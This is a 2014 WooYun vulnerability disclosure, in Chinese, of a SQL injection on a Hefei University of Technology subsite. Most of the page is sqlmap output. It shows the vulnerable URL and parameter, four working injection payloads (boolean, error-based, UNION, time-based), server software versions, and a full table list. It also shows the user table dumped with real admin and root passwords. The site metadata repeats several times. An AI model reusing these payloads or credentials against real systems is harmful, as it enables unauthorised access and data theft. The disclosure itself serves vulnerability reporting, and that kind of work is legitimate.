合肥工业大学某分站存在SQL注入一枚导致信息泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078007

漏洞标题：合肥工业大学某分站存在SQL注入一枚导致信息泄露

漏洞作者：追逐天堂

提交时间：2014-10-05 11:52

修复时间：2014-10-13 09:06

公开时间：2014-10-13 09:06

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：7

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-05：细节已通知厂商并且等待厂商处理中
2014-10-13：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

呵呵管理与账号和密码很特殊，不小心把你们挖出来的

详细说明：

注入地址：http://dwxy.hfut.edu.cn/szdw/teacherdetail.php?teacherid=3867 (GET)

sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: teacherid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: teacherid=3867 AND 1032=1032
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: teacherid=3867 AND (SELECT 4150 FROM(SELECT COUNT(*),CONCAT(0x7163726f71,(SELECT (CASE WHEN (4150=4150) THEN 1 ELSE 0 END)),0x716c787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 34 columns
    Payload: teacherid=-3141 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163726f71,0x4a61714d6b6b5a424f44,0x716c787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: teacherid=3867 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: teacherid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: teacherid=3867 AND 1032=1032
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: teacherid=3867 AND (SELECT 4150 FROM(SELECT COUNT(*),CONCAT(0x7163726f71,(SELECT (CASE WHEN (4150=4150) THEN 1 ELSE 0 END)),0x716c787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 34 columns
    Payload: teacherid=-3141 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163726f71,0x4a61714d6b6b5a424f44,0x716c787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: teacherid=3867 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0
available databases [2]:
[*] c101dwxy
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: teacherid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: teacherid=3867 AND 1032=1032
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: teacherid=3867 AND (SELECT 4150 FROM(SELECT COUNT(*),CONCAT(0x7163726f71,(SELECT (CASE WHEN (4150=4150) THEN 1 ELSE 0 END)),0x716c787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 34 columns
    Payload: teacherid=-3141 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163726f71,0x4a61714d6b6b5a424f44,0x716c787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: teacherid=3867 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0
Database: c101dwxy
[67 tables]
+-----------------------------+
| user                        |
| department                  |
| duoxun_bbs                  |
| duoxun_comment              |
| duoxun_content              |
| duoxun_links                |
| duoxun_members              |
| duoxun_news                 |
| duoxun_settings             |
| duoxun_sort                 |
| duoxun_subject              |
| duoxun_templates            |
| duoxun_toppic               |
| duoxun_upload               |
| duoxun_wordfb               |
| dzwl_education              |
| dzwl_news                   |
| dzwl_notify                 |
| information                 |
| messageboard                |
| messageboard_b              |
| pagecontent                 |
| picnews                     |
| picplay                     |
| picurl                      |
| qfzy_commentmeta            |
| qfzy_comments               |
| qfzy_links                  |
| qfzy_options                |
| qfzy_postmeta               |
| qfzy_posts                  |
| qfzy_term_relationships     |
| qfzy_term_taxonomy          |
| qfzy_terms                  |
| qfzy_usermeta               |
| qfzy_users                  |
| register                    |
| sm_admin                    |
| sm_admin_cs                 |
| sm_content                  |
| sm_content_cs               |
| sm_counter                  |
| sm_download                 |
| sm_download_cs              |
| sm_link                     |
| sm_link_cs                  |
| sm_log                      |
| sm_menu                     |
| sm_messenger                |
| sm_messenger_cs             |
| sm_order                    |
| sm_order_cs                 |
| sm_setup                    |
| sm_system_priv              |
| teacher_class               |
| teacher_detail              |
| teacher_detail_back20110903 |
| upfile                      |
| wlsys_guestbook             |
| wlxadmin                    |
| wlxinfor                    |
| wlxinfor_back20130408       |
| wlxmenu                     |
| wlxpicurl                   |
| wlxteacher                  |
| wlxupfile                   |
| ww_index                    |
+-----------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: teacherid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: teacherid=3867 AND 1032=1032
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: teacherid=3867 AND (SELECT 4150 FROM(SELECT COUNT(*),CONCAT(0x7163726f71,(SELECT (CASE WHEN (4150=4150) THEN 1 ELSE 0 END)),0x716c787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 34 columns
    Payload: teacherid=-3141 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163726f71,0x4a61714d6b6b5a424f44,0x716c787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: teacherid=3867 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0
Database: c101dwxy
Table: user
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| user   | varchar(20) |
| id     | tinyint(4)  |
| pass   | varchar(20) |
+--------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: teacherid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: teacherid=3867 AND 1032=1032
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: teacherid=3867 AND (SELECT 4150 FROM(SELECT COUNT(*),CONCAT(0x7163726f71,(SELECT (CASE WHEN (4150=4150) THEN 1 ELSE 0 END)),0x716c787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 34 columns
    Payload: teacherid=-3141 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163726f71,0x4a61714d6b6b5a424f44,0x716c787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: teacherid=3867 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0
Database: c101dwxy
Table: user
[2 entries]
+-------+--------+
| pass  | user   |
+-------+--------+
| admin | admin  |
| 8888  | root   |
+-------+--------+

漏洞证明：

同上

修复方案：

过滤或者转义

版权声明：转载请注明来源追逐天堂@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-10-13 09:06

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078007

漏洞标题：合肥工业大学某分站存在SQL注入一枚导致信息泄露

相关厂商：合肥工业大学

漏洞作者：追逐天堂

提交时间：2014-10-05 11:52

修复时间：2014-10-13 09:06

公开时间：2014-10-13 09:06

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：7

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源追逐天堂@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078007

漏洞标题：合肥工业大学某分站存在SQL注入一枚导致信息泄露

相关厂商：合肥工业大学

漏洞作者： 追逐天堂

提交时间：2014-10-05 11:52

修复时间：2014-10-13 09:06

公开时间：2014-10-13 09:06

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：7

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-078007"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 追逐天堂@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：追逐天堂

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源追逐天堂@乌云